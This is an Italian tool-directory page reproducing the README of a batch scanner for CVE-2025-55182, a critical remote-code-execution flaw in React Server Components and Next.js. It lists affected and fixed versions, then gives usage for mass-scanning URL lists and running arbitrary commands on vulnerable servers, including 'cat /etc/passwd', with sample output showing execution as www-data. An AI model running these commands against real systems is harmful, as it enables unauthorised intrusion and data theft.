Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-Scanner — Scanner automatico per CVE-2025-55182: una vulnerabilità RCE critica in React Server Components e Next.js. | Kitploit
Strumenti/GitHubGitHub/qixinlee/cve-2025-55182-scanner
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubqixinlee/cve-2025-55182-scanner

CVE-2025-55182-Scanner

Scanner automatico per CVE-2025-55182: una vulnerabilità RCE critica in React Server Components e Next.js.

Vedi Repository
18 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 RCE Scanner

Scanner di rilevamento e verifica in modalità batch per la vulnerabilità di esecuzione remota di codice CVE-2025-55182 (React2Shell).

⚠️ Vulnerabilità critica con CVSS 10.0 | Colpisce React Server Components e le versioni Next.js 15.x/16.x | Solo per test di sicurezza autorizzati

Panoramica della vulnerabilità

CVE-2025-55182 (nota anche come "React2Shell") è una vulnerabilità di esecuzione remota di codice (RCE) non autenticata con livello di gravità massimo CVSS 10.0.

La vulnerabilità deriva da un problema di deserializzazione non sicura nel pacchetto react-server di React Server Components (RSC) durante la gestione del protocollo RSC "Flight". Un attaccante può eseguire codice arbitrario sul server vulnerabile inviando richieste HTTP appositamente predisposte.

Poiché Next.js utilizza il protocollo RSC "Flight", anche le applicazioni configurate di default create con create-next-app possono essere sfruttate senza che lo sviluppatore debba scrivere alcun codice aggiuntivo. Dal 5 dicembre 2025, è stato rilevato uno sfruttamento attivo di questa vulnerabilità.

Versioni interessate

Versioni interessate di React Server Components:

Nome pacchettoVersioni interessate
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0

Versioni Next.js interessate (con App Router):

Altri framework/strumenti RSC potenzialmente interessati:

  • react-router
  • waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk
  • RedwoodJS (modalità RSC)

Misure di mitigazione temporanee

⚠️ Nota importante: non esistono misure di mitigazione temporanee note per questa vulnerabilità; l'aggiornamento a una versione sicura è l'unica soluzione.

Versioni consigliate per l'aggiornamento:

  • React: aggiornare a 19.0.1, 19.1.2 o 19.2.1
  • Next.js: aggiornare a 16.0.7, 15.5.7, 15.4.8 o 15.3.6

È possibile utilizzare il pacchetto npm ufficiale fix-react2shell-next per facilitare l'aggiornamento delle applicazioni Next.js interessate.

Installazione delle dipendenze

root@kitploit:~
pip install requests

Utilizzo

Utilizzo di base

root@kitploit:~
# Scansione in batch (legge i target da urls.txt)
python CVE-2025-55182.py -f urls.txt

# Test su target singolo
python CVE-2025-55182.py -u http://192.168.1.100:3000

Comandi personalizzati

root@kitploit:~
# Esegue il comando whoami
python CVE-2025-55182.py -f urls.txt -c "whoami"

# Esegue il comando hostname
python CVE-2025-55182.py -u http://target.com -c "hostname"

# Legge un file
python CVE-2025-55182.py -f urls.txt -c "cat /etc/passwd"

Opzioni avanzate

root@kitploit:~
# Specifica numero di thread e timeout
python CVE-2025-55182.py -f urls.txt -t 50 --timeout 15

# File di output personalizzato
python CVE-2025-55182.py -f urls.txt -o scan_results.csv

# Modalità silenziosa (mostra solo gli URL vulnerabili)
python CVE-2025-55182.py -f urls.txt -q

Descrizione dei parametri

Formato del file URL

Un URL per riga, ad esempio:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000

Esempio di output

root@kitploit:~
    +---------------------------------------------------------------+
    |   ###   ## #######  ##  ## ########       ## #######          |
    |   ####  ## ##       ## ##     ##          ## ##               |
    |   ## ## ## #####     ###      ##          ## #######          |
    |   ##  #### ##       ## ##     ##      ##  ##       ##         |
    |   ##   ### ####### ##   ##    ##       ####  #######          |
    |                                                               |
    |   CVE-2025-55182 RCE Scanner                                  |
    +---------------------------------------------------------------+

============================================================
  [ CONFIGURAZIONE ]
============================================================
  > Target: 10
  > Thread: 20
  > Comando: id

============================================================
  [ SCANSIONE ]
============================================================
  [14:30:25] [VULNERABILE] http://192.168.1.10:3000
             '--> uid=1000(www-data)
  [14:30:26] [SICURO] http://192.168.1.11:3000

+==========================================================+
|                     SCAN COMPLETE                        |
+==========================================================+
|  Total Targets :    10                                   |
|  Vulnerable    :     1                                   |
|  Safe          :     9                                   |
|  Errors        :     0                                   |
+==========================================================+

File di output

I risultati della scansione vengono salvati in formato CSV, con i seguenti campi:

  • url - URL del target
  • status - Codice di stato HTTP
  • vulnerable - Indica se la vulnerabilità è presente
  • output - Output dell'esecuzione del comando
  • error - Messaggio di errore

Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. Non utilizzarlo per scopi illegali. L'utente si assume ogni responsabilità correlata.

Scarica lo strumento
Versione principaleIntervallo di versioni interessateVersione corretta
16.0.x≤ 16.0.616.0.7
15.5.x≤ 15.5.615.5.7
15.4.x≤ 15.4.715.4.8
15.3.x≤ 15.3.515.3.6
15.2.x≤ 15.2.5-
15.1.x≤ 15.1.8-
15.0.x≤ 15.0.4-
14.x Canary≥ 14.3.0-canary.77-
ParametroDescrizioneValore predefinito
-f, --fileFile con elenco di URLurls.txt
-u, --urlURL target singolo-
-t, --threadsNumero di thread concorrenti20
--timeoutTimeout della richiesta (secondi)10
-o, --outputFile CSV di outputresults.csv
-c, --commandComando da eseguireid
-q, --quietModalità silenziosafalse